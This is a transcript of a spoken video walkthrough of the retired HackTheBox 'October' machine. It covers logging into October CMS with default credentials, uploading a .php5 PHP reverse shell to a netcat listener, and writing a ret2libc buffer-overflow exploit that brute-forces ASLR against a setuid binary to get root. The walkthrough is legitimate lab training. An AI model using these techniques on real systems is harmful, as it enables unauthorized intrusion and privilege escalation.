Hey guys, what is going on? This is IPSec, and since HackTheBox.eu retired October, we will try to do a walkthrough in October. And I say try because this is one of the two boxes I did not want to get retired because it does get pretty complex, and especially when there's easier PrivEscs out there. The PrivEsc, if you're a sadist, you will enjoy yourself. If not, my apologies. We'll try to get through it. Before we worry about PrivEsc, let's get a local shell in the box. So nmap-sv to enumerate versions, sc, save scripts, OA, all formats. Name that nmap and the IP, which is 10.10.10.16. Not going to run it because it takes time. Instead, I have the output. So nmap.nmap. We see it's listening on port 80. So going over to that, we see October CMS, and just scrolling down, we see 2017. I like seeing this in the copyright because most times it's not automatically generated, so we can have an idea this software is up to date. The other thing, again, October CMS, so we can do search exploit October, and we see one exploit. For ease of viewing, I have this loaded up in ExploitDB. We also see the date is 2017, so there is a good chance that it is vulnerable. Going over into this page, let's look at what exploits there are. So we have a PHP upload protection bypass for authenticated users, and it looks like you can upload like .php5 files because it's only restricting PHP, PHP3, PHP4, PHTML. Next one, upload.htaccess, that's going to be another authenticated. Stored WCI and image name, authenticated. I'm just looking for an unauthenticated because that's the one I would go for first. 5, authenticated. So we have to get login to this box before we can do anything. The other thing I want to look at is this view forms. We see it is using the vanilla form system, I believe it is. And if this loads, yeah, vanilla forms, I believe that's what I have. Yeah. And we see there is a exploit in 2017 for these forms. Going into this, it is going to be a PHP mailer exploit. And before we go running this and just testing out, we should find a way to verify the version is vulnerable. And this isn't going to work, but on most platforms it does work. So we know it's a 2017 exploit, and we know, or we assume, a form is from 2017. So what we're going to do is Google vanilla forum download and just download the source code because it is open source. So here's the latest one. We see 231 updated a critical issue in PHP mailer. So copy link location, go to a terminal. We'll name this vanilla. Okay, and then we can guess that 230 may just be 2.3. I have to do a wget. And it's saved. So let's just verify that they're different files with MD5 sum. They are. So what we're going to do next is make 2 directories. Oh, 1 directory and put 2 things in it. We'll just do 2 directories. Sorry about that. 3.0, 3.1, go into 3.0, unzip, // it doesn't have the zip extension on those. Is that normal? Are those zips? Nope, not normal. Download file now. There we go. wget and 2.3. Copy link, wget. Okay, the J41 is 2.3. So unzip, J4, CD3.1, unzip, okay, we got both the forms unzipped, and we can just remove those zip files now. So the next step is to do MD5 sums on every single file in here, because we want to see what files have changed. So we're going to do find dot dash type for file dash exec MD5 sum, and that should do it. Yep. The next thing is if we do sort by unique, this will be a difference in the string, so we want to remove .1 and .0. So we're going to pipe that to sed s, then 0, 1. And now we see there's no more that .0 or .1. So now we can sort this, count the uniques. To speed this up, let's throw this into a file called hashes. So, sort hashes, count the number of uniques in them, and then sort in reverse order. We see there's a lot of differences. A lot of these are .php files, and since we can't see the source code of PHP files, let's exclude them. So, before we do this unique, we're going to do grep-v.php and terminate the string. And we see there's only 1, 2, 3, 4 files that change. Hashes is something we create. So the README changes and the vendor composer license changes. So what we want to do is see if we can access README on these October forums. So forum/readme.md. No. Try to go here. No. It doesn't work, unfortunately, because this is Composer, and Composer does not expose those files. I believe that's the reason. But use this technique for enumerating other software versions. JavaScript's a great one that changes a lot. But since the only change to this version was to fix that vulnerability, it's not going to have many files that change. So we could keep going down that exploit rabbit hole and trying that, since we couldn't verify if it's vulnerable or not. But we could also just try stupid things. So let's Google October CMS admin login. And go into the first link. Don't have it. So we see localhost/admin/backend. If you dir-busted this, it would have told you there's a page /backend, but I accidentally deleted my dir-bust, or dir-b, or www.fuzz. But if you do some Googling, you'll find /backend is a login page to October, and we're just going to try the username admin and the password admin. And we get in. So now all those CVEs that we had found were authenticated, so we can exploit these. The first one was a file upload, so that's the one we're going to do. We're going to upload a file, and I'm in my op shell folder. I have cmd.php5. Let's do this PHP reverse shell. We don't need to get a full TTY just yet. So, upload this. And let me go see what's actually in that directory. cd op shells php cat last php reverse. This is a default one on Kali, so there's my IP, and I'm sending it back to port 888. If you just do locate php reverse shell.php, you can find that file in a few directories. So nclvnp 888, and we're going to call this October. And when we go to execute this file, we get a reverse shell. So now we are www-data on this system. If we run like Linux Priv check or any of the enumeration scripts, it'll show there's a file with a set UID bit, and I'm just going to search for that right away. What set UID does is allows the program to switch to the context of the user that owns the program. So that's kind of how sudo works. Hold on one sec, let me just type, because this could take a few seconds to run. Yep, that'll search the whole system for set UID files. So that's how sudo runs. Sudo is owned by root, so it can switch to the context of any user, because it has that set UID bit. Ping, fuse mount, su, ping6, all these do. These programs just don't allow you to execute shells or execute code. If there was an exploit in, say, ping, then there's a chance you could go to root, because root can run ping. Ping can escalate to root, because it has the sticky bit set. Hopefully that's explained. If not, just Google it. And hopefully this shows us the path shortly. I know we're going to have to send a file back to us. So let's go back. And whoops, went back too far, October. So nc-l, we want to send a file. We'll do 999 -p. I'm going to send this to ovrfl, I believe is the file name. This doesn't matter, it's just directing the input. Go back to October, and we can see this binary. This one, out of all of them, looks a bit different because user local bin ovrflw. What the heck is that doing? So let's look at it. Sending this back to my box, so NC 10 10 12 194, port 999. I think this is the correct syntax. And we'll direct this. I forgot a dash wait 5. Crap. This may not work. NC-W5, I think it is 10 10 12 194. Do I have to specify port on NC? We'll try not. Nope. Okay. NC and netcat NC and ncat are completely different binaries, same purpose, and the flags get mixed up, so sometimes that gets confusing. So let's just make sure we have the full file. 0E ED. First two, last two. General rule of thumb, if those match, we should be safe. 0E ED. Okay, so we got the file on our Kali box. The issue is this is a 32-bit box, and my Kali is 64. And they're different operating systems, etc. So if we cat etc lsb release, we can see this is Ubuntu 14.04 trusty. And if you want to do exploit dev, you try to clone the client as close as possible, just because less things will change. So I have built a Ubuntu trusty image, but let's go ifconfig python-m simple HTTP server, so we can easily send this. I do that mistake a lot, m instead of n. I don't know why. Copy this, Ubuntu. And this is where it's going to get difficult. So we have to download this binary, 8000 ovrfl, I think I called it. Yep. Let's just move this into desktop's fine for now. MD5 sum ovrfl 0EED. Good. We got to make that executable. Okay. So we try to execute it. It says it wants a string. Give it a string. Does nothing. If we do Python, let's see, print. Oh my god, I hate doing this live. A times 200? Maybe? No. I escaped something that I probably didn't have to. Oh. I was reading that backtick wrong. This will be easy. Print A times 200 and end tick. There we go. And we see a seg fault. So we have an overflow, as the binary indicates, and the very first step is to identify exactly where this crashes at. So if we open up GDB, and I have PED, what is it? PEDA installed. Python Exploitation Development Assistance, maybe? But it's going to change the output of my GDB. I would highly recommend Googling that and installing it. So we can overflow b main run. That's what this program does, is makes it so much more easy. It's like the Mona for Linux, I guess, except it does more. So we're going to rerun this with python-c print a times 200 and end. Continue, and we'll crash. We stopped at 41414141. And if we do python-c print 0x41, oh my god. 41 is A. That's what you need to remember. There we go. Oh. That was embarrassing. But 41 is A. So we crashed it with 4 A's. And if you want to know why, I will explain it in a future video where there's less stuff to get through, but hopefully you have a basic understanding of how buffer overflows work. We just overwrote the stack with 4 A's. The other thing we should have done first is checksec. And we can see that NX is enabled, and this is dep. So we can't just drop shellcode on the stack and then jump to it. The other thing that I probably should have done back on our shell is LDD ls/lib ls/lib/i386-linux-gnu. I really hate not having tab autocomplete. Let's do that real quick. Python-c, import pty, pty.spawn. I can't do this in a tmux session. Open new terminal. nc lvnp 888. Listening. Okay. Go back. Got a shell. Python-c. Import pty, pty.spawn. Bin bash. Yes. Okay. sty raw minus echo. Foreground this. And I got tab autocompletion. Awesome. LDD/lib/i386. libc.so.6. grep for, is it system I want? No, I just want to do on overflow and grep for libc. I'm getting ahead of myself. User local bin LDD overflow grep system grep libc. There we go. So we can see the address of libc is changing constantly, and that is ASLR. Okay, that's what I want to show you. Hopefully this video works. Again, I hate doing edits, and there's a lot to this PrivEsc. So we know ASLR is enabled on the OS. It's not within this binary. Dep is enabled, so we can't just jump to shellcode. So the first thing is to check if ASLR is enabled on my host. So LDD overflow grep libc, and we see it is. So I'm going to disable that. So we echo proc to echo 0 to proc sys kernel randomize VA space, do that as root, and now my libc is always going to be at the same spot. So we don't have to work around ASLR right now, which is going to help us. The next thing we have to do is identify where the buffer overflow actually occurs. So to do that, we're going to go back to our HackTheBox because I don't have the tools on my other box. And let's see. Pattern. Nope. So we're going to do locate pattern underscore on Kali. We see create and offset. I'm going to do create. What? Oh. Do I want the one there? I think that one requires being in Metasploit. Go to the one in user share. There we go. -H for usage. So we want one with, let's just do 200 length. And what this is going to do is generate us a complete unique string. So no matter if I was at these 4 bytes, I could know exactly where. I forget the name of the string, but it's a pattern that never repeats. So go to Ubuntu /GDB overflow, run, pass it the argument. We see we crash in 64413764. So go back to our HackTheBox, offset, look at the help. We want to query 112. So in 112 bytes, that's when we start overwriting EIP. So go back to our Ubuntu, exit this, and we can start the buffer overflow.py script. Import struct, and we want buff equals a times 112, and then buff. This is what we're going to overwrite the stack with, and I'm going to just start putting code here, struct.pack, little endian format, and see if I type this right. 0xd3adc0d3. What I typed up here doesn't matter. If it works well, you'll see what I did. It's just, I guess, a small joke. GDB overflow again, run, python, buff.py, and we have a crash and where I type dead code. So we know that's where we get to overwrite EIP and we can start directing code. The next thing to this exploit is we're going to do something called return to libc. Because it has the dep protection, we can't just drop shellcode and execute it. But we can drop the memory location to the system syscall in Linux and then have that pointed to a string that we control or found to execute the code. So we're never executing code off the stack we placed, we're just making a instruction appear out of thin air. In order to kind of understand how that works, let's write a program in C. And it sounds a lot tougher than it is, but we'll do ret libc and include std libh void main system bin sh, and I forgot to put a semicolon. Simplest program ever. It's just gonna call the system command because all we want to do is kind of see how this looks on or within the assembly. So now we can compile it with gcc retlibc and -out retlibc. And then when we GDB it, we can see exactly what is going on. So I'm going to set a breakpoint on main, run, and go to instructions where we're setting up the syscall. So if we look at this address is going to be /bin/sh. And what we're doing right here is just moving this to ESP, which is the top of the stack. So one step, and we pop that address on the stack, which is bin sh. Then when we call system, it's also going to put another address on the stack, the exit code. And this is where the program's going to go to after this command runs. So the syscall takes two arguments from the stack. The first one is going to be 4 bytes long. It is the exit address. The second one is going to be 4 bytes long, and it is the memory location to the string you want to execute. So again, we're not executing anything on the stack. We're just placing pointers on the stack and then saying, hey, use this program and run the pointers on the stack, if that makes sense. Hopefully it does. So that is how the return to libc works. We have ASLR disabled on our kernel, so our next step is to start building a Python script. So I don't know why I executed GDB, but go back into it. In order to do this, we need a few variables. So, I know why I did this. I want to open up tmux. Tmux new -s htb. Split this half this way. Okay. V buff.py. This is our skeleton script we had just to execute the buffer overflow with dead code. And now we want to run GDB. So we will need to get the memory address of system. So print system on GDB, and we get this address. And we can put system address is equal to struct.pack Okay. The next address we will need is we'll need the address of bin sh somewhere in the program. So we're going to do search mem /bin/sh. Didn't find anything. Are we running? Yes, we were. Search mem bin sh. There we go. And we see it in libc. So all we were looking for is the location of that string within libc. So we can do argument address is equal to struct.pack I. Okay. And we also needed the exit address. But in reality, this doesn't matter. So we can just do struct.pack. Let's take this. So this will be our new overflow. So we can add these. So buffer address plus system address, buffer plus exit address, and buffer argument address. So when we run this program, overflow python buff.py, exit address not defined. exit_addr. Oh, I have plus equals here. There we go. seg fault. That's not good. Oh, what are we missing? So, what we can do, exit, GDB overflow, run, python, buff.py. Did I do plus equals here? Buff A12, system exit, arg, yeah. So, I didn't break main, so let's restart this. Break main, run, python, buff.py. Dis as main, we want to, I believe this is where the buffer overflow is occurring. Maybe. So we got here, looking at the stack, we have this, which should be system, and this. Let's go back to my Python code. I don't know what I did to get this address. I think I copied something completely incorrect. So, this is where system is. I have no idea what went there. And now we got code execution there. We exit, and it seg faults because we're pointed back to a spot that doesn't exist. If we remove PETA from a thing real quick and just do regular GDB, it's easier to see. Run, that should be fine. Python buff.py. So we got the shell in the program, and then we exit, it seg faults on dead code. So if we really wanted to, we could edit a script and go back here, p exit, take this memory location, and drop it right here. And we probably won't crash now. ls who am I, exit, and it doesn't crash. So as you see, anything can go in that exit address. It's just how the program will handle itself crashing, I guess you can say. But now we have to get into the hard part and bypass ASLR, because this exploit won't work, because ASLR is changing the location of everything. So let's sudo back to root. And we'll echo 2 there, turn ASLR back on. And now when we do LDD on overflow, grep for system, LibC, we want to grep for, we see LibC changing again. But there's one thing that's peculiar, is it's not changing by that much. All of them begin with these 3 zeros, or end with those 3 zeros, and start with B7. Most of them have 5, some of them have 6. And then this byte is really the only byte that is changing that much. So each bit is 16 possible values. 16 times 16 is 256. So there's 256 possible values that this could be, and it looks like 2 possible values the one to the left could be, either 5 or 6. So if we ran this program 512 times, there's a chance, a good chance, that we're going to hit this address. and we'll know exactly where LibC is, and that's what they call brute forcing ASLR. This doesn't work on programs that when you crash, you don't have another attempt, but for this one, it will do just fine, because we can crash it as many times as we want. So let's get back into our exploit script. What we have to do is find a few addresses. So first we have to know or assume where libc is, and we no longer have to do this on our VM. We can start beginning to do this on the actual host, and we will to save time. So we're going to cat our exploit script what we have so far, copy it, and go to our VM. And why isn't that going full screen? View, out of full screen, view, full screen. There we go, okay. So we're on October here, this window, and we're going to go to dev shm, because that's a temporary file system. If we forget to clean up and the system reboots, it cleans up for us. So we're going to name this buff.py, paste our script, exit out, make sure buff.py runs, and it does. So what we need to do is we need to get the location of where libc is. And remember, it changes every single time. So going here, we can do ldd on user local bin, I don't have it there, overflow, grep for system, oh not system, I need a grep for libc. Grep for libc. And we can do that a few times to show that ASLR is indeed enabled and changes by those 1 byte. There we go. So 7576, these 2 bytes change quite much, and then you have the B7 and triple zeros. So it's behaving just like our VM. We just want to grab one of these libc addresses. So we're going to grab the first one and go back in dev shm because I don't know why I left. vbuff.py. Ah, this is in a real shell. I didn't leave. Go in this one. First things first, we have to import a library that will allow us to call a program, because we're going to call this a few hundred times. And then put our libc base address here. So we know 1 out of 512 times probably the libc is going to be in this location. The next step is we have to get the system address, exit address, and argument address. They're not going to be here, but they are going to be within this program. So we're going to find the offset of where system address is. So get out of this. We're going to use a tool called readelf-s /lib i386 libc.so.6. And I should do that with grep on system. So there's the system offset. Add this. So system off equals that. The next step will be to do the exit address, and honestly, we're not going to care about this because, as we showed, it doesn't really matter. So exit address is equal to, actually we'll grab it. Why not? Good practice and all. Grep for exit. There it is. And if that was the wrong exit, again, doesn't matter. So 0x, there's that. Now the argument address, this is the bin sh, that's going to be a little bit different. We're going to use strings -a tx and on the same binary. So lib i386 libc.so.6. I won't grep so we can show what it's doing. It's just printing all the strings and also showing the memory location. So now when we grep for bin sh, we get the memory location 162 BAC. So going back, I believe this can be 3 zeros. So that's 1, 2, 1, 2, 1, 2, 1, 2. Nope, I think that's right. Yep. Okay. So we got the offsets. So at byte 4310 in libc, we're going to have the system call. At byte 332260 in libc, we have the exit. And at this byte, we'll have bin sh. So for sake of documenting, we can say, put a comment there, that is bin sh. So the next thing we have to do is the math. So we're going to say the libc address plus the system offset will give us the location for the system address. Same thing for the exit address. And I just butchered the crap out of these variable names. It's been a long video, guys. What can I say? libc base address plus argument offset. That should all be good. Let's exit out and run the program just to make sure we don't have a typo. Good, it runs. So the next thing we have to do is call this program 512 times. So we do that through that process we had imported before. So we'll say I equals 0 while I is less than 512. Print try. So we're going to say what number of try it is, and then increment I. And then after we increment I, we can call the program. So ret equals call user local bin ovrflw, I believe it was, and then pass it the argument of our buffer. Okay. And that may be it. So let's try this. Does this work? It's not incrementing I. That's not what I wanted. I screwed something up marvelously. Maybe I didn't put the percent. Give this a few more seconds. Oh, there we go. We got shell. So who am I? Root. And then cd/root ls-la cat root.text. And there you go. That is October. Hopefully that makes sense. If it doesn't, let me know and maybe I'll do more videos on these topics. Take care, have a good night, or whatever time it is. Bye.